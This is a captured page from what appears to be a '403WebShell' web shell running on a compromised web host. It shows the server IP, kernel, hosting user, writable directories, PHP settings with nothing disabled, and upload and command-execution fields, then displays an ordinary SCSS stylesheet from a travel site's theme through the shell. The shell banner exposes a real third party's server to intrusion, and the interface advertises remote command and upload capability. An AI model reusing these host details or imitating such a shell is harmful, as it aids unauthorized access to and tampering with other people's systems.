Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.145.88.155
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/public/themes/mytravel/sass/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/public/themes/mytravel/sass/app.scss
@import "font";
@import "variables";
@import "base";
@import "review";
@import "404";
@import "block";


@import "boostrap";
@import "size";
@import "space";
@import "style";
@import "location";

//Modules Media
@import "../../../../resources/module/media/admin/scss/browser";
body {
    margin: 0;
    font-family: "Rubik", Helvetica, Arial, sans-serif;
    font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #3b444f;
    text-align: left;
    background-color: #fff;
}
/* Prevents img without src to appear */
//For Lazy Load
img.lazy{
    opacity: 0;
    &:not(.initial) {
        transition: opacity 1s;
    }
    &.initial,
    &.loaded,
    &.error{
        opacity: 1;
    }
}
img:not([src]) {
    visibility: hidden;
}
img[data-src],
img[data-srcset] {
    display: block;
    min-height: 1px;
}

a{
    text-decoration: none;
}

ul, ol {
    padding: 0;
    margin: 0;
}

.clear{
    &:before,
    &:after
    {
        display: table;
        content: "";
        clear: both;
    }
}
[v-cloak]{
    display: none;
}
@import "header";
.bravo_wrap {
    .bravo_footer {
        .mailchimp {
            padding-top: 65px;
            padding-bottom: 40px;
            background: #F5F5F5;
            @media(max-width: 766px){
                padding-top: 45px;
                padding-bottom: 20px;
            }
            .media-left {
                padding-right: 30px;
                @media(max-width: 766px){
                    padding-right: 15px;
                }
                i{
                    font-size: 80px;
                    top: -10px;
                    position: relative;
                    @media(max-width: 766px){
                        top: -20px;
                    }
                }
            }

            .media-body {
                .media-heading {
                    font-size: 24px !important;
                    @media(max-width: 766px){
                        font-size: 18px !important;
                    }
                }

                p {
                    font-size: 16px !important;
                    color: #5E6D77 !important;
                    @media(max-width: 766px){
                        font-size: 14px !important;
                    }
                }
            }

            .subcribe-form {
                position: relative;
            }

            .subcribe-form .form-control {
                height: 55px;
                line-height: 53px;
                font-size: 14px;
                -webkit-box-shadow: none;
                box-shadow: none;
                border-color: #D7DCE3;
                @media(max-width: 766px){
                    height: 40px;
                    line-height: 40px;
                }
            }

            .subcribe-form .btn-submit {
                border: none;
                border-radius: 0 5px 5px 0;
                position: absolute;
                top: 0;
                right: 0;
                height: 55px;
                line-height: 55px;
                color: #FFF;
                background: #1a2b48;
                padding-left: 25px;
                padding-right: 25px;
                font-weight: 600;
                text-transform: uppercase;
                @media(max-width: 766px){
                    height: 40px;
                    line-height: 40px;
                }
                @media(max-width: 990px){
                    padding-left: 15px;
                    padding-right: 15px;
                }
            }
        }

        .main-footer {
            margin: 20px 0;

            .nav-footer {
                .title {
                    text-transform: uppercase;
                    font-weight: 500;
                    padding: 20px 0;
                    margin-bottom: 31px;
                    position: relative;
                    &:before {
                        position: absolute;
                        bottom: 0;
                        content: "";
                        width: 120px;
                        border-bottom: 1px solid #ebebeb;
                        left: 0;
                        @media(max-width: 768px){
                            width: 100%;
                        }
                    }
                    @media(max-width: 766px){
                        padding: 15px 0;
                        margin-bottom: 15px;
                    }
                }

                .context {
                    ul {
                        list-style: none;

                        li {
                            display: block;

                            a {
                                margin-bottom: 25px;
                                font-size: 14px;
                                font-weight: 400;
                                display: block;
                                color: #1A2B48;
                                text-decoration: none;
                                transition: all 0.3s;

                                &:hover {
                                    color: #5191FA;
                                }
                            }
                        }
                    }

                    .contact {
                        border-left-width: 3px;
                        padding-left: 20px;
                        border-left-color: #5191fa;
                        border-left-style: solid;
                        margin-bottom: 30px;

                        .c-title {
                            color: #5e6d77;
                            margin-bottom: 10px;
                        }

                        .sub {
                            font-weight: 500;
                            font-size: 18px;

                            a {
                                margin-right: 20px;
                                text-decoration: none;
                                i{
                                    color: #1a2b48;
                                }
                            }

                        }
                    }
                }
            }
        }
        .sub-footer{
            @media (max-width: 767px){
                flex-direction: column;
                .footer-select{
                    padding-top: 2rem;
                    .dropdown-menu{
                        min-width: 120px!important;
                        top: -15px!important;
                    }
                }
            }
        }

        .copy-right {
            border-top: 1px solid #EAEEF3;
            p{
                margin-bottom: 0;
            }
            .context {
                position: relative;
                .f-visa {
                    position: absolute;
                    right: 15px;
                    top: 50%;
                    transform: translate(0, -50%);
                    @media(max-width: 460px){
                        position: initial;
                        margin-top: 10px;
                        transform: translate(0);
                    }
                }
                padding: 40px 15px;
                @media(max-width: 766px){
                    padding: 20px 15px;
                }
            }
        }
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit